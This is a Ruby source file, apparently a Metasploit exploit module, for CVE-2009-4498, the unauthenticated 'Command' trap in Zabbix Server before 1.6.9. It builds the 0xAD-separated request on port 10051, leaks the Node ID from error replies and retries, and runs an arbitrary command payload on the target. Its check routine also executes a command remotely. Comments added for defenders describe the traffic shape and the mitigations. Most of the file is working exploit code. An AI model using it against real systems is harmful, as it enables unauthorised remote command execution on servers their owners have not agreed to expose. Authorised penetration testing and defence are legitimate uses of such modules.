Path: blob/master/modules/exploits/linux/misc/zabbix_server_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2009-4498: the Zabbix Server "Command" trap runs
# a caller-supplied command without authentication.
#
# Notes for defenders, drawn from the module itself:
# * The request is a single line sent to the server port (default RPORT 10051)
#   that starts with the literal "Command" followed by byte 0xAD, then a node
#   id, a host id and the command, each separated by 0xAD. Traffic of that
#   shape reaching the port from hosts that are not part of the monitoring
#   setup is worth alerting on.
# * The server reply can disclose its Node ID ("NODE <n>"), which the module
#   reads back and reuses.
# * Per the vendor statement quoted in the description, versions prior to
#   1.6.9 are affected; upgrading and limiting network reachability of the
#   port are the mitigations.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and the default target port.
  #
  # @param info [Hash] metadata passed in by the framework and merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zabbix Server Arbitrary Command Execution',
        'Description' => %q{
        This module abuses the "Command" trap in Zabbix Server to execute arbitrary
        commands without authentication. By default the Node ID "0" is used, if it doesn't
        work, the Node ID is leaked from the error message and exploitation retried.

        According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability
        has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.
        },
        'Author' => [
          'Nicob <nicob[at]nicob.net>', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2009-4498' ],
          [ 'OSVDB', '60965' ],
          [ 'BID', '37989' ],
          [ 'EDB', '10432' ],
          [ 'URL', 'https://support.zabbix.com/browse/ZBX-1030' ]
        ],
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic telnet',
            # *_perl, *_python and *_ruby work if they are installed
          }
        },
        'Targets' => [
          [ 'Zabbix 1.6.7', { } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Sep 10 2009'
      )
    )

    register_options([Opt::RPORT(10051)])
  end

  # Builds one "Command" request and returns the server's first reply.
  #
  # The fields are separated by "\255", an octal escape for the single byte
  # 0xAD, and the request ends with a newline. The host id is three random
  # digits chosen on every call.
  #
  # @param sock    the connected socket to write to and read from
  # @param node_id node id field; the callers pass 0 or the value captured
  #                from a previous reply
  # @param cmd     command text placed in the last field
  # @return whatever sock.get_once returns; the callers treat a falsy value
  #         as "no response"
  def send_command(sock, node_id, cmd)
    random_host = Rex::Text.rand_text_numeric(3)
    request = "Command\255"
    ["#{node_id}\255", "#{random_host}\255", "#{cmd}\n"].each do |field|
      request << field
    end
    sock.put(request)
    sock.get_once
  end

  # Decides whether the target answers the "Command" trap.
  #
  # This check is intrusive: it asks the server to run `echo <random text>`
  # and reports Vulnerable only when that text comes back, so a Vulnerable
  # result means a command was executed on the target.
  #
  # @return Exploit::CheckCode::Vulnerable when the random marker is echoed
  #         (on the first try or on the retry with the leaked Node ID),
  #         Exploit::CheckCode::Safe otherwise, including when nothing is
  #         received
  def check
    peer = "#{rhost}:#{rport}" # assigned as in the original; not read below
    marker = Rex::Text.rand_text_alpha(rand(5)+5)
    probe = "echo #{marker}"

    connect
    vprint_status("Sending 'Command' request...")
    reply = send_command(sock, 0, probe)
    disconnect

    # No response
    return Exploit::CheckCode::Safe unless reply

    vprint_status(reply)
    return Exploit::CheckCode::Vulnerable if reply =~ /#{marker}/

    # The retry is taken only when the reply contains "-1" anywhere and a
    # "NODE <digits>" token. NOTE(review): "-1" is presumably the error
    # status; the match is loose and \d* also accepts an empty Node ID.
    return Exploit::CheckCode::Safe unless reply =~ /-1/ && reply =~ /NODE (\d*)/

    leaked_node = Regexp.last_match(1)
    vprint_good("Node ID #{leaked_node} discovered")

    # Retry with the good node_id
    connect
    vprint_status("Sending 'Command' request with discovered Node ID...")
    reply = send_command(sock, leaked_node, probe)
    disconnect

    if reply && reply =~ /#{marker}/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # Sends the encoded payload through the "Command" trap, retrying once with
  # the Node ID taken from the reply when the first attempt (Node ID 0) is
  # answered with "-1" and a "NODE <digits>" token.
  #
  # When datastore['CMD'] is set (the cmd/unix/generic payload), the reply is
  # inspected for the bytes 0x30 0xAD and the text after their last
  # occurrence is printed as command output.
  def exploit
    peer = "#{rhost}:#{rport}" # assigned as in the original; not read below
    target_node = 0
    command = payload.encoded

    connect
    print_status("Sending 'Command' request...")
    reply = send_command(sock, target_node, command)
    disconnect

    if reply && reply =~ /-1/ && reply =~ /NODE (\d*)/
      # Retry with the good node_id
      target_node = Regexp.last_match(1)
      print_good("Node ID #{target_node} discovered")
      connect
      print_status("Sending 'Command' request with discovered Node ID...")
      reply = send_command(sock, target_node, command)
      disconnect
    end

    # Read command output from socket if cmd/unix/generic payload was used
    return unless datastore['CMD']

    if reply && reply =~ /\x30\xad/
      print_good("Command executed successfully")
      print_status("Output:\n#{reply.split("\x30\xad").last}")
    else
      print_error("Failed to execute the command")
    end
  end
end